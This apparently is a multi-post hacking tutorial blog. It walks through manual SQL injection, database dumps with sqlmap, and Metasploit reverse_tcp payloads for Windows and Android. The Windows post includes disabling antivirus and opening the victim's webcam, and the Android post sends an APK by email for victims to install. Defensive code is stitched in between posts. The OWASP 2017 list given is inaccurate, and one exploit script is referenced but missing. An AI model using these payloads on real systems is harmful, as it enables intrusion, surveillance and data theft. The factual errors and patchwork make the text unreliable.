Sunday, 8 January 2023

Manual SQL Injection



  • Hello everyone, this blog is related to manual SQL injection.

Step 1: 

First you have to open your target website; here we are going to perform manual SQL injection on a .pk website.

Website: www.sample.com


Step 1:

First we have to check whether this website is injectable or not (add ' after the URL).

Yes!!! It is.

Step 2:

Now we have to check the available tables in the website using the SQL query "order by".


Step 3:

Now use the union select query; add - before the id number.



Now you can retrieve data according to your needs.

Step 4:

Now, replacing 2 with database(), we got the available database.



Step 5:

Now, using the union select group_concat query, we got the following database table details.



Step 6:

Now, using the union select group_concat query, we got the following database table column details.


Huh! SQL injections are all about guess and try. It could take a lot of trial and error to get that perfect query.
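As an added defender-side example (not part of the original post), the script below scans web server access logs for the probe stages walked through above: the appended quote, order by, union select, and database()/group_concat. The Apache-style log format and the sample lines are constructed for this example.

```python
"""Flag the manual SQL-injection probe stages described above in web server
access logs.  Added example; the Apache-style log lines are constructed."""
import re
from urllib.parse import unquote_plus

# Client IP, request path and status from an Apache combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# One pattern per stage of the walkthrough, matched against the URL-decoded
# query string: quote test, column counting, UNION extraction, schema enumeration.
PROBE_PATTERNS = {
    "quote_test": re.compile(r"=\s*-?\d+\s*'(?:\s|&|$)"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\b(?:database\(\)|group_concat\()", re.I),
}

def classify_request(path):
    """Return the sorted names of the probe patterns found in the decoded query string."""
    _, _, query = path.partition("?")
    decoded = unquote_plus(query)
    return sorted(name for name, rx in PROBE_PATTERNS.items() if rx.search(decoded))

def scan_access_log(lines):
    """Return (ip, status, path, matched_patterns) for each suspicious request.
    A 5xx right after the quote test is the error the walkthrough reads as 'yes, it is'."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        matches = classify_request(m.group("path"))
        if matches:
            findings.append((m.group("ip"), int(m.group("status")), m.group("path"), matches))
    return findings

# Constructed sample: one client walks through the probe stages; the others are benign.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Jan/2023:10:15:01 +0000] "GET /news.php?id=5\' HTTP/1.1" 500 1532',
    '203.0.113.7 - - [08/Jan/2023:10:15:09 +0000] "GET /news.php?id=5%20order%20by%203-- HTTP/1.1" 200 4021',
    '203.0.113.7 - - [08/Jan/2023:10:15:30 +0000] "GET /news.php?id=-5%20union%20select%201,database(),3-- HTTP/1.1" 200 4100',
    '198.51.100.4 - - [08/Jan/2023:10:16:02 +0000] "GET /news.php?id=5 HTTP/1.1" 200 4019',
    '198.51.100.9 - - [08/Jan/2023:10:16:40 +0000] "GET /search.php?q=O%27Brien HTTP/1.1" 200 2210',
]
```

Running `scan_access_log(SAMPLE_LOG)` returns three findings, all from 203.0.113.7, and the benign `O'Brien` search is not flagged because the quote test requires a numeric parameter.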


Saturday, 7 January 2023

Database dump using sqlmap



  • Hello everyone, this blog is related to database dump using sqlmap.


Step 1: Open Kali Linux

Step 2: Type the following command to get all options of 'sqlmap'.

    # sudo sqlmap -hh

Step 3: Type the following command to see whether the target website contains a SQL injection vulnerability or not.

    # sudo sqlmap -u "targetsite.com"

Step 4: To see the number of databases the target website has, run

    # sudo sqlmap -u "targetsite.com" --dbs

Step 5: To list the tables from any of the above databases, use the command

    # sudo sqlmap -u "targetsite.com" -D database_name --tables


Step 6: To list the content of a particular table, use the command

    # sudo sqlmap -u "targetsite.com" -D database_name -T table_name --dump


Step 7: If you want to use a dictionary attack in sqlmap when you receive a hashed password, follow the given steps.


Step 8: You got the data.



Wednesday, 21 December 2022

SQL Injection Vulnerability


SQL injection is a type of cyber attack in which an attacker inserts malicious code into a database through a website's input field, in order to gain unauthorized access to sensitive information stored in the database. This type of attack can be particularly damaging because it allows the attacker to manipulate and extract data from the database, potentially exposing sensitive information such as passwords, credit card numbers, and personal details.


There are several tools and methods that attackers may use to carry out SQL injection attacks. One common method is to use a web application scanner, such as SQLMap or Havij, to identify and exploit vulnerabilities in a website's code. Attackers may also manually inject malicious code into a website's input fields, using techniques such as error-based injection or union-based injection.


An example of an SQL injection exploit might look like this:

http://example.com/login.php?username=admin'%20OR%201=1--


In this example, the attacker has appended an additional piece of code to the end of the URL, which tells the database to return all rows where the username is "admin" or where 1=1. This will always return true, so the database will return all rows in the table, potentially exposing sensitive information.


To protect against SQL injection attacks, it is important to use parameterized queries and input validation. Parameterized queries allow you to specify placeholders for user input, rather than directly inserting user input into the query. This helps to prevent attackers from injecting malicious code into the query.

Input validation is also important, as it helps to ensure that user input meets certain criteria before it is processed by the application. This can help to prevent attackers from injecting malicious code into the input fields.
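As an added example (not code from the original post), the snippet below puts the string-built login lookup beside its parameterized form and feeds both the `admin' OR 1=1--` input from the URL above, with an allow-list validation step in front. The users table and its rows are constructed for this example.

```python
"""The login lookup from the example above, built by string concatenation and
then with a parameter placeholder.  Added example; the users table is constructed."""
import re
import sqlite3

USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")  # allow-list for input validation

def make_db():
    """In-memory SQLite database with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users (username, password_hash) VALUES (?, ?)",
                     [("admin", "<hash of admin password>"), ("alice", "<hash of alice password>")])
    return conn

def find_user_vulnerable(conn, username):
    """Concatenates the input into the SQL text.  With admin' OR 1=1-- the quote
    closes the literal, OR 1=1 is true for every row, and -- comments out the rest."""
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]

def find_user_parameterized(conn, username):
    """The ? placeholder keeps the value out of the SQL text, so the whole input
    is compared as one username and the payload matches no account."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]

def validate_username(username):
    """Input validation layered in front of the query: reject anything outside the allow-list."""
    return bool(USERNAME_RE.match(username))

def login_lookup(conn, username):
    """Defensive path: validate first, then query with a parameter."""
    if not validate_username(username):
        return []
    return find_user_parameterized(conn, username)

if __name__ == "__main__":
    db = make_db()
    payload = "admin' OR 1=1--"  # the input from the URL example above
    print("vulnerable:", find_user_vulnerable(db, payload))        # ['admin', 'alice']
    print("parameterized:", find_user_parameterized(db, payload))  # []
```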


Other measures that can be taken to protect against SQL injection attacks include using prepared statements, using stored procedures, and escaping special characters in user input. When dynamic SQL statements are needed, executing them through parameterized queries or stored procedures likewise helps to prevent SQL injection attacks.


In addition to these measures, it is also important to keep the database and all applications up to date with the latest security patches, as this can help to prevent vulnerabilities from being exploited by attackers. It is also a good idea to regularly scan your website for vulnerabilities, and to use a web application firewall to help block malicious traffic.


Overall, SQL injection attacks can be devastating for businesses and individuals, as they can expose sensitive information and compromise the security of a database. By implementing the proper safeguards, however, it is possible to protect against these types of attacks and keep your database and sensitive information secure.

Broken Access Control Vulnerability


Broken access control is a type of security vulnerability that occurs when a system fails to properly enforce authorization and authentication controls. This can allow unauthorized users to gain access to restricted resources or perform actions that they are not authorized to perform.


One example of a broken access control vulnerability is a website that does not properly restrict access to administrative pages. An attacker could potentially exploit this vulnerability by crafting a script that allows them to bypass the authorization controls and gain access to the administrative pages.



For example, consider the following exploit script:




In this example, the script sends a GET request to the administrative page of the website and checks the status code of the response. If the status code is 200 (success), the script prints a message indicating that it was able to access the administrative page. If the status code is anything other than 200, the script prints a message indicating that access was denied.

To prevent this type of broken access control vulnerability, it is important to implement strong and secure authentication and authorization controls. This includes using strong passwords, implementing multi-factor authentication, and regularly reviewing and updating access control policies to ensure that they are up-to-date and effective.

In addition to implementing strong authentication and authorization controls, it is also important to use secure communication protocols to prevent the interception of sensitive information. This can include the use of secure sockets layer (SSL) or transport layer security (TLS) to encrypt communication between the user and the website.

Finally, it is important to regularly review and monitor access control logs to identify and address any potential vulnerabilities. This can help to prevent unauthorized access to restricted resources and ensure that access control policies are being properly enforced.
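As an added example (not the post's own code), the check below enforces authorization on the server for the administrative pages discussed above, denying any path without a rule, and reviews constructed access-log records for the condition the missing script tests for: a non-admin request that was answered 200. The route table, session tokens and log format are assumptions made for this example.

```python
"""Deny-by-default authorization for the administrative pages discussed above,
plus the access-log review the text recommends.  Added example; the route table,
session store and log records are constructed."""

# Route prefix -> required role.  A path matching no rule is denied (404), so a
# new admin page is never reachable just because nobody wrote a rule for it.
ROUTE_ROLES = {"/admin": "admin", "/account": "user"}

# Constructed session store: token -> role.  Unknown or missing tokens are anonymous.
SESSIONS = {"tok-admin-1": "admin", "tok-user-7": "user"}

def under_prefix(path, prefix):
    """True for the prefix itself and anything below it, not for look-alikes such as /admin-panel."""
    return path == prefix or path.startswith(prefix + "/")

def authorize(path, session_token):
    """Server-side check run for every request; returns the status to answer with."""
    for prefix, role_needed in ROUTE_ROLES.items():
        if under_prefix(path, prefix):
            break
    else:
        return 404                       # no rule: deny by default
    role = SESSIONS.get(session_token)
    if role is None:
        return 401                       # no valid session
    if role != role_needed and role != "admin":
        return 403                       # authenticated, but not this role
    return 200

def parse_record(line):
    return dict(field.split("=", 1) for field in line.split()[1:])  # timestamp, then key=value

def audit_admin_access(log_lines):
    """Return lines where a non-admin session was served an /admin page with 200."""
    flagged = []
    for line in log_lines:
        rec = parse_record(line)
        if (under_prefix(rec.get("path", ""), "/admin")
                and rec.get("status") == "200" and rec.get("role") != "admin"):
            flagged.append(line)
    return flagged

# Constructed access-log records; the third is the misconfiguration to catch.
SAMPLE_LOG = [
    "2023-01-05T10:00:01Z role=admin path=/admin/users status=200",
    "2023-01-05T10:00:09Z role=anonymous path=/admin/users status=401",
    "2023-01-05T10:02:33Z role=anonymous path=/admin/settings status=200",
    "2023-01-05T10:03:10Z role=user path=/account status=200",
]
```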


Summary:
Broken access control is a serious security vulnerability that can allow unauthorized users to gain access to restricted resources or perform unauthorized actions. To prevent these vulnerabilities, it is important to implement strong and secure authentication and authorization controls, use secure communication protocols, and regularly review and monitor access control logs.

Tuesday, 20 December 2022

OWASP Top 10 Web Application Vulnerabilities: 2017

The OWASP (Open Web Application Security Project) Top 10 is a list of the most common and most critical web application vulnerabilities. The list is compiled and maintained by the OWASP Foundation, a non-profit organization that promotes web application security.


The OWASP Top 10 is designed to provide web developers, security professionals, and organizations with a prioritized list of the most critical web application vulnerabilities. The list is updated every three to four years to reflect the current state of web application security.


The version of the OWASP Top 10 released in 2017 includes the following vulnerabilities:

1. Injection: This vulnerability occurs when user input is not properly validated and is passed directly to a system command or database query, allowing an attacker to execute arbitrary code or manipulate data.

2. Broken Authentication and Session Management: This vulnerability occurs when authentication and session management controls are improperly implemented, allowing an attacker to gain unauthorized access to the system.

3. Cross-Site Scripting (XSS): This vulnerability occurs when user input is not properly validated and is returned to the user's browser, allowing an attacker to inject malicious code that is executed by the browser.

4. Insecure Direct Object References: This vulnerability occurs when an application references an object directly, such as a file or database record, without proper validation, allowing an attacker to access unauthorized objects.

5. Security Misconfiguration: This vulnerability occurs when an application is misconfigured, exposing it to potential attacks.

6. Sensitive Data Exposure: This vulnerability occurs when sensitive data, such as passwords or credit card numbers, is transmitted in an insecure manner or stored in an insecure location.

7. Cross-Site Request Forgery (CSRF): This vulnerability occurs when an attacker tricks a user into making an unauthorized request to a website, potentially allowing the attacker to perform actions on behalf of the user.

8. Using Components with Known Vulnerabilities: This vulnerability occurs when an application uses third-party components that have known vulnerabilities, exposing the application to potential attacks.

9. Insufficient Logging and Monitoring: This vulnerability occurs when an application does not adequately log and monitor security events, making it difficult to detect and respond to potential attacks.

10. Failure to Restrict URL Access: This vulnerability occurs when an application does not properly restrict access to specific URLs, potentially allowing unauthorized users to access restricted resources.


By understanding and addressing these vulnerabilities, organizations can significantly improve the security of their web applications and protect against potential attacks.

Sunday, 2 January 2022

Windows Exploit using Metasploit



  • Hello everyone, this blog is related to exploiting a Windows system (Windows 10) using Kali Linux.
  • So, basically we need two operating systems: the first one is Kali (attacker) and the second one is Windows (victim).
  • This practical works when both of the machines are on the same network.
  • So, I have installed Kali Linux and Windows 10 in VirtualBox.
  • I have managed to put both machines on the same network; you have to do the same if you are also trying to do the same as me. Otherwise, the important thing is that both machines have to be on the same network.
  • This also works if you have Kali as the host machine and on the other side you have a Windows 10 PC with you.
  • You can also install Kali on VirtualBox and set it to NAT network (Bridged is recommended).
  • To be sure, you can ping the Windows 10 machine from Kali to check whether the machines are on the same network or not.


Practical Starts Here :

STEP 1 :- 

Go to the Kali Linux terminal and type the following command as shown below:-

  • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<your Kali IP> lport=8080 -f exe > <exploit name>.exe



STEP 2 :-

Now the exe file is created so move it to your target machine (NOTE:- TURN OFF THE ANTIVIRUS TO EXECUTE THE FILE).


STEP 3 :-

Now type the following commands as follows:-

  • msfconsole
  • use exploit/multi/handler
  • set payload windows/x64/meterpreter/reverse_tcp
  • set lhost <your Kali IP>
  • set lport 8080
  • exploit


STEP 4 :- 

Now click on the exe file from your target machine.


STEP 5 :- 

Now you can see that a session has been created in Kali Linux.


STEP 6 :- 

Now you have full control of your target machine, which is a Windows machine in our case.


STEP 7 :- 

I have shown you an example by opening the webcam of the target machine.


STEP 8 :- 

You can also use different commands to operate the target machine. To know the different commands, type help and you will get all the commands listed.

Android Exploitation using Metasploit



Hello everyone, this blog is related to exploiting Android using Kali Linux.


Introduction:

In this blog post, we will explore how to exploit Android devices using Kali Linux. We will use Kali Linux's powerful tools and techniques to create a payload, send it to the target device, and gain control over it. Please note that this guide is for educational purposes only, and any unauthorized use of these techniques is strictly prohibited.

Step 1: Generating the Payload

  • Open Terminal or Root Terminal in Kali Linux.
  • Write the following command to generate the payload for Android:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Choose a Port> -o android.apk 

Replace <Your IP Address> with your machine's IP address and <Choose a Port> with a port number of your choice (e.g., 4444, 8080).       

Step 2:- Sending and Installing the Payload

  • Send the generated APK file (android.apk) to the target Android device using a preferred method (email, file sharing, etc.).
  • On the target device, locate the APK file and install it. You may receive a security warning during installation. Proceed by tapping "Install Anyway."
  • Once installed, the application's icon will appear on the device's home screen.



  • After installing it, it will ask for permissions, as shown below.



  • After tapping "Install Anyway", it will look as shown in the image (MainActivity).

Step 3:-

Write the commands shown below:

  • msfconsole
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set lhost <Your IP address>
  • set lport <the port you used in the payload>
  • run (or exploit)

Then click on MainActivity on the Android device.
